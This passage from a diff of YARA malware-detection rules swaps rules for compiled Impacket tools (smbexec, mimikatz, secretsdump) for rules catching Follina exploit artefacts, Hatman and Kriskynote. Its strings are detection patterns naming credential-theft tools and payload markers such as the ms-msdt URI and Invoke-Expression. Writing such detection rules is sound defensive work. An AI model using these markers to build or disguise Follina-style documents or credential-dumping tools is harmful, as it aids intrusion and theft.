-		( uint16( 0 ) == 0x5a4d and filesize < 11000KB and all of them )
+		filesize < 10MB and $a and 1 of ( $sa* ) and 1 of ( $sb* ) and not 1 of ( $fp* ) and not uint8( 0 ) == 0x7B
 }
-rule SIGNATURE_BASE_Impacket_Tools_Opdump : FILE
+rule SIGNATURE_BASE_SUSP_Doc_Wordxmlrels_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1bb0e747-e9b7-5a54-8052-428351be8d0d"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L176-L190"
+		description = "Detects a suspicious pattern in docx document.xml.rels file as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard, Wojciech Cieslak"
+		id = "304c4816-b2f6-5319-9fe9-8f74bdb82ad0"
+		date = "2022-05-30"
+		modified = "2022-06-20"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L38-L60"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "18b772e19fd61d77f3a671ee097e0f032738a73a360f4cfe79df4eb6377e12b1"
-		score = 75
+		hash = "62f262d180a5a48f89be19369a8425bec596bc6a02ed23100424930791ae3df0"
+		logic_hash = "c9846f8c2c1724792de14ab4de0064f951a8faaf01cc27d873e600f29d59c842"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "e2205539f29972d4e2a83eabf92af18dd406c9be97f70661c336ddf5eb496742"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s2 = "bopdump.exe.manifest" fullword ascii
-		$s3 = "sopdump" fullword ascii
+		$a1 = "<Relationships" ascii
+		$a2 = "TargetMode=\"External\"" ascii
+		$x1 = ".html!" ascii
+		$x2 = ".htm!" ascii
+		$x3 = "%2E%68%74%6D%6C%21" ascii
+		$x4 = "%2E%68%74%6D%21" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		filesize < 50KB and all of ( $a* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Sniff : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Externalresource_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "07051edc-91a8-59d6-87bf-dba98ef28588"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L192-L206"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard"
+		id = "71bb97e0-ec12-504c-a1f6-25039ac91c86"
+		date = "2022-05-30"
+		modified = "2022-05-31"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L62-L78"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "b317e23d1f76cec4d5b14cb95d463ec410551052b30f1d2d5f52a441104108c0"
-		score = 75
+		logic_hash = "c841e0c1ff78bf8dade5f573a7452b16a7f447cfc19417704b727684a8f3d3ff"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "8ab2b60aadf97e921e3a9df5cf1c135fbc851cb66d09b1043eaaa1dc01b9a699"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "ssniff" fullword ascii
-		$s2 = "impacket.eap(" ascii
+		$s1 = " LINK htmlfile \"http" ascii
+		$s2 = ".html!\" " ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		uint32be( 0 ) == 0x7B5C7274 and filesize < 300KB and all of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbexec : FILE
+rule SIGNATURE_BASE_EXPL_Follina_CVE_2022_30190_Msdt_Msprotocoluri_May22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "02208817-2eab-54e2-90cf-44dbf5474607"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L208-L222"
+		description = "Detects the malicious usage of the ms-msdt URI as seen in CVE-2022-30190 / Follina exploitation"
+		author = "Tobias Michalski, Christian Burkard"
+		id = "62e67c25-a420-5dac-9d1c-b0648ea6b574"
+		date = "2022-05-30"
+		modified = "2022-07-18"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L80-L98"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0f424dd5cc525ef0bd9671c4c1b8da0a1ff9eb79056cc081c1ebe7c9bf75fee6"
-		score = 75
-		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "7d715217e23a471d42d95c624179fe7de085af5670171d212b7b798ed9bf07c2"
+		logic_hash = "d56820737951f97606749c74025589e6a8ecbe70cfff069492368b2ba8528a7d"
+		score = 80
+		quality = 60
+		tags = "CVE-2022-30190, FILE"
+		hash1 = "4a24048f81afbe9fb62e7a6a49adbd1faf41f266b5f9feecdceb567aec096784"
+		hash2 = "778cbb0ee4afffca6a0b788a97bc2f4855ceb69ddc5eaa230acfa2834e1aeb07"
 
 	strings:
-		$s1 = "logging.config(" ascii
-		$s2 = "ssmbexec" fullword ascii
+		$re1 = /location\.href\s{0,20}=\s{0,20}"ms-msdt:/
+		$a1 = "%6D%73%2D%6D%73%64%74%3A%2F" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		filesize > 3KB and filesize < 100KB and 1 of them
 }
-rule SIGNATURE_BASE_Impacket_Tools_Goldenpac : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_Jun22 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "9894d16c-83fa-5e1d-9ca6-572deeec006a"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L224-L239"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources"
+		author = "Christian Burkard"
+		id = "e9c83d58-6214-51d5-882a-4bd2ed6acc9a"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L100-L131"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0c764083a699204819f9ff6e2664a50d467447d0fff040ef32a8e28cc678b3cd"
+		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
+		logic_hash = "36cb711399197c694ac4fa4fd49cd5d587a830e152a138c81851b8e16301803d"
 		score = 75
 		quality = 85
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "4f7fad0676d3c3d2d89e8d4e74b6ec40af731b1ddf5499a0b81fc3b1cd797ee3"
 
 	strings:
-		$s1 = "impacket.examples.serviceinstall(" ascii
-		$s2 = "bgoldenPac.exe" fullword ascii
-		$s3 = "json.scanner(" ascii
+		$sa = "\\objdata" ascii nocase
+		$sb1 = "4f4c45324c696e6b" ascii
+		$sb2 = "4F4C45324C696E6B" ascii
+		$sc1 = "d0cf11e0a1b11ae1" ascii
+		$sc2 = "D0CF11E0A1B11AE1" ascii
+		$x1 = "68007400740070003a002f002f00" ascii
+		$x2 = "68007400740070003A002F002F00" ascii
+		$x3 = "680074007400700073003a002f002f00" ascii
+		$x4 = "680074007400700073003A002F002F00" ascii
+		$x5 = "6600740070003a002f002f00" ascii
+		$x6 = "6600740070003A002F002F00" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		( uint32be( 0 ) == 0x7B5C7274 or uint32be( 0 ) == 0x7B5C2A5C ) and $sa and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Netview : FILE
+rule SIGNATURE_BASE_SUSP_Doc_RTF_Ole2Link_EMAIL_Jun22 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "1b9238d2-b9b1-5633-8481-05a3a97af5a6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L241-L256"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources inside e-mail attachments"
+		author = "Christian Burkard"
+		id = "48cde505-3ce4-52ef-b338-0c08ac4f63de"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L133-L192"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e0beb6235838b4e8a1312ba53c539c6c3d732ba13a0190c654dcf7ec4389e364"
+		hash = "4abc20e5130b59639e20bd6b8ad759af18eb284f46e99a5cc6b4f16f09456a68"
+		logic_hash = "fcbb3e32762f8c67b5b226e8095b767d630f8c118521a82fc22f9a3cc272b794"
 		score = 75
-		quality = 85
+		quality = 83
 		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "ab909f8082c2d04f73d8be8f4c2640a5582294306dffdcc85e83a39d20c49ed6"
 
 	strings:
-		$s1 = "impacket.dcerpc.v5.wkst(" ascii
-		$s2 = "dummy_threading(" ascii
-		$s3 = "snetview" fullword ascii
+		$sa1 = "XG9iamRhdG" ascii
+		$sa2 = "xvYmpkYXRh" ascii
+		$sa3 = "cb2JqZGF0Y" ascii
+		$sb1 = "NGY0YzQ1MzI0YzY5NmU2Y" ascii
+		$sb2 = "RmNGM0NTMyNGM2OTZlNm" ascii
+		$sb3 = "0ZjRjNDUzMjRjNjk2ZTZi" ascii
+		$sb4 = "NEY0QzQ1MzI0QzY5NkU2Q" ascii
+		$sb5 = "RGNEM0NTMyNEM2OTZFNk" ascii
+		$sb6 = "0RjRDNDUzMjRDNjk2RTZC" ascii
+		$sc1 = "ZDBjZjExZTBhMWIxMWFlM" ascii
+		$sc2 = "QwY2YxMWUwYTFiMTFhZT" ascii
+		$sc3 = "kMGNmMTFlMGExYjExYWUx" ascii
+		$sc4 = "RDBDRjExRTBBMUIxMUFFM" ascii
+		$sc5 = "QwQ0YxMUUwQTFCMTFBRT" ascii
+		$sc6 = "EMENGMTFFMEExQjExQUUx" ascii
+		$x1 = "NjgwMDc0MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+		$x2 = "Y4MDA3NDAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+		$x3 = "2ODAwNzQwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+		$x4 = "NjgwMDc0MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+		$x5 = "Y4MDA3NDAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
+		$x6 = "2ODAwNzQwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+		$x7 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzYTAwMmYwMDJmMD" ascii
+		$x8 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM2EwMDJmMDAyZjAw" ascii
+		$x9 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNhMDAyZjAwMmYwM" ascii
+		$x10 = "NjgwMDc0MDA3NDAwNzAwMDczMDAzQTAwMkYwMDJGMD" ascii
+		$x11 = "Y4MDA3NDAwNzQwMDcwMDA3MzAwM0EwMDJGMDAyRjAw" ascii
+		$x12 = "2ODAwNzQwMDc0MDA3MDAwNzMwMDNBMDAyRjAwMkYwM" ascii
+		$x13 = "NjYwMDc0MDA3MDAwM2EwMDJmMDAyZjAw" ascii
+		$x14 = "Y2MDA3NDAwNzAwMDNhMDAyZjAwMmYwM" ascii
+		$x15 = "2NjAwNzQwMDcwMDAzYTAwMmYwMDJmMD" ascii
+		$x16 = "NjYwMDc0MDA3MDAwM0EwMDJGMDAyRjAw" ascii
+		$x17 = "Y2MDA3NDAwNzAwMDNBMDAyRjAwMkYwM" ascii
+		$x18 = "2NjAwNzQwMDcwMDAzQTAwMkYwMDJGMD" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		filesize < 10MB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* ) and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbtorture : FILE
+rule SIGNATURE_BASE_SUSP_DOC_RTF_Externalresource_EMAIL_Jun22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "4f9b55e2-93ce-5d08-a228-73233fb0a2c6"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L258-L272"
+		description = "Detects a suspicious pattern in RTF files which downloads external resources as seen in CVE-2022-30190 / Follina exploitation inside e-mail attachment"
+		author = "Christian Burkard"
+		id = "3ddc838c-8520-5572-9652-8cb823f83e27"
+		date = "2022-06-01"
+		modified = "2025-03-21"
+		reference = "https://doublepulsar.com/follina-a-microsoft-office-code-execution-vulnerability-1a47fce5629e"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L194-L220"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "63cbd6511c5498b39fa5efadb8fe0caeeaa8d4c2afe534a0169ea38f205a9cba"
-		score = 75
+		logic_hash = "73e76bd80f77640c0d8d47ebb7903eb9cc23336fbe653e7d008cae6a0de7c45b"
+		score = 70
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "d2856e98011541883e5b335cb46b713b1a6b2c414966a9de122ee7fb226aa7f7"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "impacket" fullword ascii
-		$s2 = "ssmbtorture" fullword ascii
+		$sa1 = "PFJlbGF0aW9uc2hpcH" ascii
+		$sa2 = "xSZWxhdGlvbnNoaXBz" ascii
+		$sa3 = "8UmVsYXRpb25zaGlwc" ascii
+		$sb1 = "VGFyZ2V0TW9kZT0iRXh0ZXJuYWwi" ascii
+		$sb2 = "RhcmdldE1vZGU9IkV4dGVybmFsI" ascii
+		$sb3 = "UYXJnZXRNb2RlPSJFeHRlcm5hbC" ascii
+		$sc1 = "Lmh0bWwhI" ascii
+		$sc2 = "5odG1sIS" ascii
+		$sc3 = "uaHRtbCEi" ascii
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		filesize < 400KB and 1 of ( $sa* ) and 1 of ( $sb* ) and 1 of ( $sc* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Mimikatz : FILE
+rule SIGNATURE_BASE_SUSP_Msdt_Artefact_Jun22_2 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "0b1f5ad0-7070-58d5-946f-157dcb9627ab"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L274-L289"
+		description = "Detects suspicious pattern in msdt diagnostics log (e.g. CVE-2022-30190 / Follina exploitation)"
+		author = "Christian Burkard"
+		id = "aa2a4bd7-2094-5652-a088-f58d0c7d3f62"
+		date = "2022-06-01"
+		modified = "2022-07-29"
+		reference = "https://twitter.com/nas_bench/status/1531718490494844928"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L222-L241"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "0dce4086887877aa77063dfa3c69d7a17cfa0815c4ca417144d3bbb6ebe68650"
+		logic_hash = "e18f6405f0411128335336e65dda4ed2b6be6e9ad47b94646ececf0479fbe967"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2d8d500bcb3ffd22ddd8bd68b5b2ce935c958304f03729442a20a28b2c0328c1"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "impacket" fullword ascii
-		$s2 = "smimikatz" fullword ascii
-		$s3 = "otwsdlc" fullword ascii
+		$a1 = "<ScriptError><Data id=\"ScriptName\" name=\"Script\">TS_ProgramCompatibilityWizard.ps1" ascii
+		$x1 = "/../../" ascii
+		$x2 = "$(Invoke-Expression" ascii
+		$x3 = "$(IEX(" ascii nocase
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		uint32( 0 ) == 0x6D783F3C and $a1 and 1 of ( $x* )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Smbrelayx : FILE
+rule SIGNATURE_BASE_SUSP_LNK_Follina_Jun22 : CVE_2022_30190 FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "84abf3cf-841c-592d-a9d1-71d5e76eb43f"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L291-L307"
+		description = "Detects LNK files with suspicious Follina/CVE-2022-30190 strings"
+		author = "Paul Hager"
+		id = "d331d584-2ab3-5275-b435-6129c7291417"
+		date = "2022-06-02"
+		modified = "2025-03-21"
+		reference = "https://twitter.com/gossithedog/status/1531650897905950727"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_doc_follina.yar#L243-L261"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "2afcede9d9f5af102c68e705f29242bc3a56485e79c0acfc347a4ea7f823dfda"
+		logic_hash = "0b63bb266b968987b2b5a83c9429e96acbd57e12178e4f5fd5894b23d1aaa237"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "9706eb99e48e445ac4240b5acb2efd49468a800913e70e40b25c2bf80d6be35f"
+		tags = "CVE-2022-30190, FILE"
 
 	strings:
-		$s1 = "impacket.examples.secretsdump" fullword ascii
-		$s2 = "impacket.examples.serviceinstall" fullword ascii
-		$s3 = "impacket.smbserver(" ascii
-		$s4 = "SimpleHTTPServer(" ascii
+		$sa1 = "msdt.exe" ascii wide
+		$sa2 = "msdt " ascii wide
+		$sa3 = "ms-msdt:" ascii wide
+		$sb = "IT_BrowseForFile=" ascii wide
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 18000KB and 3 of them )
+		filesize < 5KB and uint16( 0 ) == 0x004c and uint32( 4 ) == 0x00021401 and 1 of ( $sa* ) and $sb
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmipersist : FILE
+rule SIGNATURE_BASE_Hatman_Compiled_Python : HATMAN
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "29bda652-28f0-5ab6-9bc2-411f20ab0dda"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L309-L323"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "fd156669-72b4-59a5-8f36-aac21d7b3105"
+		date = "2017-12-19"
+		modified = "2023-12-05"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L86-L95"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "df0dfaed264e0acc57f74e40addcaf52f6d8e832524eb638b682a358c81da83f"
+		logic_hash = "a18018e4c6ea5b7ab6e1dbdc050e565f66520676565db6d352f58a786097960f"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "2527fff1a3c780f6a757f13a8912278a417aea84295af1abfa4666572bbbf086"
-
-	strings:
-		$s1 = "swmipersist" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		tags = "HATMAN"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		SIGNATURE_BASE_Hatman_Nullsub_PRIVATE and SIGNATURE_BASE_Hatman_Setstatus_PRIVATE and SIGNATURE_BASE_Hatman_Dividers_PRIVATE
 }
-rule SIGNATURE_BASE_Impacket_Tools_Lookupsid : FILE
+rule SIGNATURE_BASE_Hatman_Injector : HATMAN
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "27f13397-b044-54b4-b5e8-c5f7ed374f59"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L325-L339"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "b939b83d-cc4a-5998-89a7-8abf8d0b8592"
+		date = "2017-12-19"
+		modified = "2023-01-09"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L96-L106"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "629ddd49377017d6ea2aac9665b21dfdf9a50c917bf915ea892faafd841bf817"
+		logic_hash = "19edf44bec6e1cbccefa145c5ae1bf0820729a80ac3ef1c8e7100b465b487e3c"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "47756725d7a752d3d3cfccfb02e7df4fa0769b72e008ae5c85c018be4cf35cc1"
-
-	strings:
-		$s1 = "slookupsid" fullword ascii
-		$s2 = "impacket.dcerpc" fullword ascii
+		tags = "HATMAN"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 15000KB and all of them )
+		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Wmiquery : FILE
+rule SIGNATURE_BASE_Hatman_Payload : HATMAN
 {
 	meta:
-		description = "Compiled Impacket Tools"
-		author = "Florian Roth (Nextron Systems)"
-		id = "e8bdf27a-9763-5947-854f-162f74ff53be"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L341-L355"
+		description = "Detects Hatman malware"
+		author = "DHS/NCCIC/ICS-CERT"
+		id = "9ef57fca-a536-5937-8510-b410f735a73e"
+		date = "2017-12-19"
+		modified = "2023-12-05"
+		reference = "https://ics-cert.us-cert.gov/MAR-17-352-01-HatMan%E2%80%94Safety-System-Targeted-Malware"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/apt_hatman.yar#L107-L116"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "fa237b5c1b4881804c33152a1ce9f3a571b506178fde455a8dd9f92af68c5610"
+		logic_hash = "9a6e5d2c2f2be35e6dc8b418e33419977460006923ecd9f029cacf51d8c0477a"
 		score = 75
 		quality = 85
-		tags = "FILE"
-		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "202a1d149be35d96e491b0b65516f631f3486215f78526160cf262d8ae179094"
-
-	strings:
-		$s1 = "swmiquery" fullword ascii
-		$s2 = "\\yzHPlU=QA" ascii
+		tags = "HATMAN"
 
 	condition:
-		( uint16( 0 ) == 0x5a4d and filesize < 17000KB and all of them )
+		(SIGNATURE_BASE_Hatman_Memcpy_PRIVATE and SIGNATURE_BASE_Hatman_Origcode_PRIVATE and SIGNATURE_BASE_Hatman_Mftmsr_PRIVATE ) and not ( SIGNATURE_BASE_Hatman_Origaddr_PRIVATE and SIGNATURE_BASE_Hatman_Loadoff_PRIVATE )
 }
-rule SIGNATURE_BASE_Impacket_Tools_Atexec : FILE
+rule SIGNATURE_BASE_Kriskynote_Mar17_1 : FILE
 {
 	meta:
-		description = "Compiled Impacket Tools"
+		description = "Detects Kriskynote Malware"
 		author = "Florian Roth (Nextron Systems)"
-		id = "4f02e304-69d4-5952-80be-793379bccac0"
-		date = "2017-04-07"
-		modified = "2025-03-29"
-		reference = "https://github.com/maaaaz/impacket-examples-windows"
-		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/gen_impacket_tools.yar#L357-L373"
+		id = "b1e5df0c-0112-5fee-85e9-cb0ca31f5234"
+		date = "2017-03-03"
+		modified = "2023-12-05"
+		reference = "Internal Research"
+		source_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/yara/crime_kriskynote.yar#L11-L30"
 		license_url = "https://github.com/Neo23x0/signature-base/blob/391a990859091dbc4c21d15db335b371090f606e/LICENSE"
-		logic_hash = "e9537a67e17fb980505aead84b15c7dc8a2f3f1e9a4088edd8b313f1b7a9675d"
+		logic_hash = "cc4861f3a612cbaba6abf8ded76972941c879f04b59c29756bf0ba8083bf93ab"
 		score = 75
 		quality = 85
 		tags = "FILE"
 		license = "Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE"
-		hash1 = "337bd5858aba0380e16ee9a9d8f0b3f5bfc10056ced4e75901207166689fbedc"
+		hash1 = "a19c4b615aa54207604b181873e614d84126b639fee2cce3ca9d5bd863f6f577"
+		hash2 = "62b41db0bf63fa45a2c2b0f5df8c2209a5d96bf2bddf82749595c66d30b7ec61"
 
 	strings:
-		$s1 = "batexec.exe.manifest" fullword ascii
-		$s2 = "satexec" fullword ascii
-		$s3 = "impacket.dcerpc" fullword ascii
-		$s4 = "# CSZq" fullword ascii
+		$s1 = "gzwrite64" fullword ascii
+		$opa1 = { e8 6b fd ff ff 83 f8 ff 74 65 83 7b 28 00 74 42 }
+		$opb1 = { 8a 04 08 8b 8e a4 16 00 00 88 44 24 0c 66 c7 04 }
+		$opb2 = { 89 4e 6c 89 46 74 e9 ad fc ff ff 8b 46 68 85 c0 }
 
 	condition:
